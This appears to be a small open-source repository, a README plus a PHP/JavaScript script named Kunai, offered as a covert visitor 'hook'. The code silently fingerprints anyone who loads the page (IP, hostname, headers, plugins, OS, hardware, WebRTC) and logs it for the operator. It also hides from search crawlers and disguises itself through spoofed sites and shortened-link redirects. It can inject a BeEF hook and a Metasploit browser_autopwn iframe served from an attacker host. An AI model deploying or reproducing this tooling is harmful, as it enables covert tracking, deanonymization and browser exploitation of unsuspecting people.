├── README.md
└── kunai.php


/README.md:
--------------------------------------------------------------------------------
 1 | #Kunai 0.2
 2 | Sometimes there is a need to obtain ip address of specific person or perform client-side attacks via user browser. This is what you need in such situations.
 3 | 
 4 | Kunai is a simple script which collects many informations about a visitor and saves output to file; furthermore, you may try to perform attacks on user browser, using beef or metasploit. 
 5 | 
 6 | In order to grab as many informations as possible, script detects whenever javascript is enabled to obtain more details about a visitor. For example, you can include this script in iframe, or perform redirects, to avoid detection of suspicious activities. Script can notify you via email about user that visit your script. Whenever someone will visit your hook (kunai), output fille will be updated.
 7 | 
 8 | #Functions
 9 | - Stores informations about users in elegant output
10 | - Website spoofing
11 | - Redirects
12 | - BeEF & Metasploit compatibility
13 | - Email notification
14 | - Diffrent reaction for javascript disabled browser
15 | - One file composition
16 | 
17 | #Example configs
18 | - Website spoofing (more stable & better for autopwn & beef):
19 | - Redirect (better for quick ip catching):
20 | ```
21 | goo.gl/urlink -> evilhost/x.php -> site.com/kitty.png
22 | ```
23 | - Cross Site Scripting (inclusion)
24 | 
25 | #Screens
26 | - http://i.imgur.com/cScbarL.png
27 | - http://i.imgur.com/WOM3uyi.png
28 | 
29 | 
30 | 
31 | 


--------------------------------------------------------------------------------
/kunai.php:
--------------------------------------------------------------------------------
  1 | <!DOCTYPE html>
  2 | <html>
  3 | <head>
  4 | 
  5 | <?php
  6 | 
  7 |  /* --------------------[settings]-------------------- */ 
  8 | 
  9 |   // 0 - Off
 10 |   // 1 - On
 11 | 
 12 |   ini_set('error_log', NULL);
 13 |   ini_set('log_errors', 0);
 14 |   ini_set('max_execution_time', 0);
 15 |   ini_set('error_reporting', 0);
 16 |   set_time_limit(0);
 17 | 
 18 |   define('hash', md5(rand(1, 1337).$_SERVER['REMOTE_ADDR'].time()));
 19 |   define('time', date("m.d.y H:i:s"));
 20 | 
 21 |   // Output
 22 |   define('output', 'output.html');
 23 | 
 24 |   // Email notification
 25 |   define('email_notify', 0);
 26 |   define('notify_address', 'usr@box.com');
 27 | 
 28 |   // Redirect
 29 |   define('redirect', 0); 
 30 |   define('redirect_url', 'http://host/');
 31 | 
 32 |   // Website spoofing
 33 |   define('use_spoofing', 0);
 34 |   define('spoof_url', 'http://host/');
 35 | 
 36 |   // Beef js hook (or custom js)
 37 |   define('use_beef', 0);
 38 |   define('hook_url', 'http://192.168.0.10:31337/hook.js');
 39 | 
 40 |   // Metasploit browser_autopwn http server (or custom iframe)
 41 |   define('use_autopwn', 0);
 42 |   define('autopwn_url', 'http://192.168.0.10:8080/woot');
 43 | 
 44 | /* --------------------------------------------------- */
 45 | 
 46 | 
 47 | if(!empty($_SERVER['HTTP_USER_AGENT'])) {
 48 |     $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
 49 |     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
 50 |         header('HTTP/1.0 404 Not Found');
 51 |         exit;
 52 |     }
 53 | }
 54 | 
 55 | if(isset($_POST['data']) && file_exists(output) && is_writable(output)) {
 56 |   $fp = fopen(output, 'a');
 57 |   fwrite($fp, $_POST['data']);
 58 |   fclose($fp);
 59 | }
 60 | 
 61 | if(file_exists(output) && filesize(output) < 5) {
 62 |   $fp    = fopen('steal.html', 'a');
 63 |   $style = '<!DOCTYPE html><html><head><meta charset="UTF-8"><style>'.
 64 |            'html { margin: 20%; } div.text { margin-left: 20%; margin-right: 10%; } body { background-color: #F5F5F5; } h3 { margin: 1em 0 0.5em 0; margin-left:-2%; color: #343434; font-weight: normal; font-size: 30px; line-height: 40px; } h4 { margin: 1em 0 0.5em 0; color: #343434; font-weight: normal; font-size: 30px; line-height: 40px; } h4:hover{ margin: 1em 0 0.5em 0; color: #1a1a1a; font-weight: 450; font-size: 30px; line-height: 40px; } table { font-family: verdana,arial,sans-serif; font-size:11px; color:#333333; border-width: 1px; border-color: #666666; border-collapse: collapse; } table th { border-width: 1px; padding: 8px; border-style: solid; border-color: #666666; background-color: #dedede; } table td { border-width: 1px; padding: 8px; border-style: solid; border-color: #666666; background-color: #f0f0f0; } a { text-decoration: none; color: 333333; } a:link, a:visited, a:active { color: #333333; } hr { border: 0; height: 0; border-top: 1px solid rgba(0, 0, 0, 0.1); border-bottom: 1px solid rgba(255, 255, 255, 0.3); } b { color: #484848; font-weight: normal; font-size: 17px; line-height: 25px; } p { text-align: center; color: #484848; font-weight: normal; font-size: 17px; line-height: 20px; }'.
 65 |            '</style>'.
 66 |            '<script type="text/javascript">function show(id) { var e = document.getElementById(id); if(e.style.display == \'block\') e.style.display = \'none\'; else e.style.display = \'block\'; } </script>'.
 67 |            '</head><body>';
 68 |   fwrite($fp, $style);
 69 |   fclose($fp);
 70 | } 
 71 | 
 72 | function notify() {
 73 | 
 74 |  $headers  = "MIME-Version: 1.0\n" ;
 75 |  $headers .= "Content-Type: text/html; charset=\"iso-8859-1\"\n";
 76 |  $headers .= "X-Priority: 1 (Highest)\n";
 77 |  $headers .= "X-MSMail-Priority: High\n";
 78 |  $headers .= "Importance: High\n";
 79 | 
 80 |   mail(notify_address, 'Sup?', 'IP logged - '.$_SERVER['REMOTE_ADDR'], $headers);
 81 | 
 82 | }
 83 | 
 84 | function nojs() {  
 85 | 
 86 | $ip   = $_SERVER['REMOTE_ADDR'];
 87 | $host = gethostbyaddr($ip);
 88 | 
 89 | if(!isset($_SERVER['HTTP_REFERER'])) { $ref = 'None'; } else { $ref = htmlspecialchars($_SERVER['HTTP_REFERER']); }
 90 | if(function_exists('getallheaders')) {
 91 | foreach(getallheaders() as $header => $info) {
 92 |   $req .= htmlspecialchars($header).' - '.htmlspecialchars($info).'<br />';
 93 | } 
 94 | } else { $req = 'Undefined'; }
 95 | 
 96 | $data = '<center><a href="#'.hash.'" onclick="show(\''.hash.'\');"><h4>'.$ip.'</h4></a></center>'.
 97 | '<div id="'.hash.'" style="display:none;"><hr /><p>'.time.'</p><div class="text">'.
 98 | '<h3>Info</h3>'.
 99 | '<br />IP - <a href="http://ipinfo.io/'.$ip.'">'.$ip.'</a>'.
100 | '<br />Host - '.$host.
101 | '<br />Referer - '.$ref.
102 | '<br />Javascript not enabled!'.
103 | '<br /><h3>Request headers</b></h3> '.$req;
104 | 
105 | if(file_exists(output) && is_writable(output)) {
106 |   $fp = fopen(output, 'a');
107 |   fwrite($fp, $data.'</div><br /><hr /></div>');
108 |   fclose($fp);
109 | }
110 | 
111 | if(redirect == 1) {
112 |   header('Location: '.redirect_url);
113 | }
114 | 
115 | }
116 | 
117 | if(isset($_GET['nojs'])) {
118 |   nojs();
119 |   exit;
120 | }
121 | 
122 | ?>
123 | 
124 | <script type="text/javascript">
125 | 
126 | function configVar() {
127 |   var config = {
128 |     host:"<?php echo 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];?>",
129 |     redirect:"<?php echo redirect; ?>",
130 |     redirect_url:"<?php echo redirect_url; ?>",
131 |     time:"<?php echo time; ?>"
132 |   };
133 |   return config;
134 | }
135 | 
136 | function getUserData() {
137 | 
138 |   if(window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection) { var rtcs = 'true'; }      else { var rtcs = 'false'; }
139 |     
140 |  if (typeof(navigator.oscpu) != "undefined" && navigator.oscpu !== null) {
141 |   var osff = " ("+navigator.oscpu+") ";
142 |  } else {
143 |   var osff = "";   
144 |  }
145 |     
146 |   var userData = {
147 |     ip:"<?php echo htmlspecialchars($_SERVER['REMOTE_ADDR']); ?>",
148 |     ref:"<?php if(!isset($_SERVER['HTTP_REFERER'])) { echo 'None'; } else { echo htmlspecialchars($_SERVER['HTTP_REFERER']); } ?>",
149 |     host:"<?php echo htmlspecialchars(gethostbyaddr($_SERVER['REMOTE_ADDR'])); ?>",
150 |     accept:"<?php echo htmlspecialchars($_SERVER['HTTP_ACCEPT']); ?>",
151 |     hash:"<?php echo hash; ?>",
152 |     browser:navigator.appCodeName+" ("+navigator.appName+") ",
153 |     resolution:window.screen.availWidth+"x"+window.screen.availHeight,
154 |     bresolution:window.outerWidth+"x"+window.outerHeight,
155 |     colordepth:screen.colorDepth+" bit",
156 |     browserver:navigator.appVersion,
157 |     useragent:navigator.userAgent,
158 |     os:navigator.platform+osff,
159 |     cookie:navigator.cookieEnabled,
160 |     lang:navigator.language,
161 |     build:navigator.buildID,
162 |     comp:navigator.productSub,
163 |     rtc:rtcs,
164 |   };
165 |   return userData;
166 | }
167 | 
168 | function getBrowserPlugins() {
169 | var L = navigator.plugins.length;
170 | var plugs = new Array();
171 | for(var i = 0; i < L; i++) {
172 |   var plug = navigator.plugins[i];
173 |   plugs.push("<tr><td>" + plug.name + "</td><td>" + plug.filename + "</td><td>" + plug.description + "</td><td>" + plug.version + "</td></tr>");
174 | }
175 | return encodeURI("<br /><center><b>" + L.toString() + " Plugin(s) Detected</b><br><table border=1 width=\"80%\"><tr><th>Name</th><th>Filename</th><th>Description</th><th>Version</th></tr>" + plugs.join('') + "</table></center>");
176 | }
177 |     
178 | function webgl_detect(return_context)
179 | {
180 |     if (!!window.WebGLRenderingContext) {
181 |         var canvas = document.createElement("canvas"),
182 |              names = ["webgl", "experimental-webgl", "moz-webgl", "webkit-3d"],
183 |            context = false;
184 | 
185 |         for(var i=0;i<4;i++) {
186 |             try {
187 |                 context = canvas.getContext(names[i]);
188 |                 if (context && typeof context.getParameter == "function") {
189 |                     if (return_context) {
190 |                         return {name:names[i], gl:context};
191 |                     }
192 |                     return true;
193 |                 }
194 |             } catch(e) {}
195 |         }
196 |         return false;
197 |     }
198 |     return false;
199 | }
200 |     
201 | function cores() {
202 |  
203 |     if (typeof(navigator.hardwareConcurrency) != "undefined" && navigator.hardwareConcurrency !== null) {
204 |         return "<b>CPU Cores:</b> "+navigator.hardwareConcurrency+"<br />";
205 |     } else if (typeof(navigator.cpuClass) != "undefined" && navigator.cpuClass !== null) {
206 |         return "<b>CPU Class:</b> "+navigator.cpuClass+"<br />";
207 |     }
208 |     else { return ''; }
209 |     
210 | }
211 |     
212 | function getPlugins() {
213 |   if (navigator.plugins) {
214 | 
215 |     var quickt = false;
216 |     var flash  = false;
217 |     var silverlight = false;
218 |     var javax = navigator.javaEnabled();
219 |     var webgl =  webgl_detect();
220 | 
221 | if (navigator.plugins["QuickTime"] )
222 | { quickt = true; }
223 | 
224 | try {
225 |   var fo = new ActiveXObject('ShockwaveFlash.ShockwaveFlash');
226 |   if (fo) {
227 |     flash = true;
228 |   }
229 | } catch (e) {
230 |   if (navigator.mimeTypes
231 |         && navigator.mimeTypes['application/x-shockwave-flash'] != undefined
232 |         && navigator.mimeTypes['application/x-shockwave-flash'].enabledPlugin) {
233 |     flash = true;
234 |   }
235 | }
236 | 
237 | try
238 | {
239 |     var slControl = new ActiveXObject('AgControl.AgControl');
240 |     silverlight = true;
241 | }
242 | catch (e)
243 | {
244 | if (navigator.plugins["Silverlight Plug-In"])
245 |     {
246 |   silverlight = true;
247 |     }
248 | }
249 | 
250 | var data = new Object();
251 |     data['quicktime']   = quickt;
252 |     data['flash']       = flash;
253 |     data['silverlight'] = silverlight;
254 |     data['java']        = javax;
255 |     data['webgl']       = webgl;
256 | return data;
257 | 
258 | }
259 |  
260 | }
261 | 
262 | function sendData(data) {
263 |  var xhr  = new XMLHttpRequest();
264 |  var divout = '<br /><hr /></div>';
265 |  xhr.open("POST", config["host"], true);
266 |  xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
267 |  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
268 |  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
269 |  xhr.withCredentials = true;
270 |  var body = "data="+data+getBrowserPlugins()+divout;
271 |  var aBody = new Uint8Array(body.length);
272 |  for (var i = 0; i < aBody.length; i++)
273 |    aBody[i] = body.charCodeAt(i); 
274 |  xhr.send(new Blob([aBody]));
275 | }
276 | 
277 | </script>
278 | </head>
279 | 
280 | <body style="margin: 0; padding: 0; height: 100%; overflow: hidden;">
281 | 
282 | <script type="text/javascript">
283 | 
284 | var userData = getUserData();
285 | var date = new Date();
286 | var data = getPlugins();
287 | var config = configVar();
288 | 
289 | var datax = encodeURI("<center><a href=\"#"+userData["hash"]+"\" onclick=\"show('"+userData["hash"]+"');\"><h4>"+userData["ip"]+"</h4></a></center>"+
290 |   "<div id=\""+userData['hash']+"\" style=\"display:none;\"><hr /><p>"+config["time"]+"</p><div class=\"text\">"+
291 |   "<h3>Host</h3>"+
292 |   "<b>IP:</b> <a href=\"http://ipinfo.io/"+userData["ip"]+"\">"+userData["ip"]+"</a><br />"+
293 |   "<b>Hostname:</b> "+userData["host"]+"<br />"+
294 |   "<b>Referer:</b> "+userData["ref"]+"<br />"+
295 |   "<h3>Browser</h3>"+
296 |   "<b>Browser:</b> "+userData["browser"]+"<br />"+
297 |   "<b>Browser version:</b> "+userData["browserver"]+"<br />"+
298 |   "<b>UserAgent:</b> "+userData["useragent"]+"<br />"+
299 |   "<b>HTTP Accept:</b> "+userData["accept"]+"<br />"+
300 |   "<b>Allow cookie:</b> "+userData["cookie"]+"<br />"+
301 |   "<b>Browser language:</b> "+userData["lang"]+"<br />"+
302 |   "<b>Build ID (YYYYMMDDHH):</b> "+userData["build"]+"<br />"+
303 |   "<b>Compilation:</b> "+userData["comp"]+"<br />"+
304 |   "<h3>Platform</h3>"+
305 |   "<b>OS:</b> "+userData["os"]+"<br />"+
306 |   cores()+
307 |   "<b>Resolution:</b> "+userData["resolution"]+"<br />"+
308 |   "<b>Browser size:</b> "+userData["bresolution"]+"<br />"+
309 |   "<b>Color depth:</b> "+userData["colordepth"]+"<br />"+
310 |   "<h3>Time</h3>"+
311 |   "<b>User pc time:</b> "+date.toLocaleString()+"<br />"+
312 |   "<b>Local time:</b> "+date.toGMTString()+"<br />"+
313 |   "<h3>Software</h3>"+
314 |   "<b>Java:</b> "+data['java']+"<br />"+
315 |   "<b>Flash:</b> "+data['flash']+"<br />"+
316 |   "<b>Silverlight:</b> "+data['silverlight']+"<br />"+
317 |   "<b>QuickTime:</b> "+data['quicktime']+"<br />"+
318 |   "<b>WebGL:</b> "+data['webgl']+"<br />"+
319 |   "<b>WebRTC:</b> "+userData['rtc']+"<br /></div>");
320 | 
321 | sendData(datax);
322 | 
323 | if(config["redirect"] == 1) {
324 |     window.setTimeout(function(){
325 |         window.location.href = config["redirect_url"];
326 |     }, 1);
327 | }
328 | 
329 | </script>
330 | 
331 | <?php
332 | 
333 | if(email_notify == 1) { notify(); }
334 | if(use_beef     == 1) { echo '<script src="'.hook_url.'"></script>'; }
335 | if(use_autopwn  == 1) { echo '<iframe src="'.autopwn_url.'"></iframe>'; }
336 | if(use_spoofing == 1) { echo '<iframe src="'.spoof_url.'" height="100%" width="100%" frameborder="0"></iframe>'; }
337 | 
338 | ?>
339 | 
340 | <noscript>
341 | <meta http-equiv="refresh" content="0;url=?nojs"/>
342 | </noscript>
343 | 
344 | </body>
345 | </html>
346 | 


--------------------------------------------------------------------------------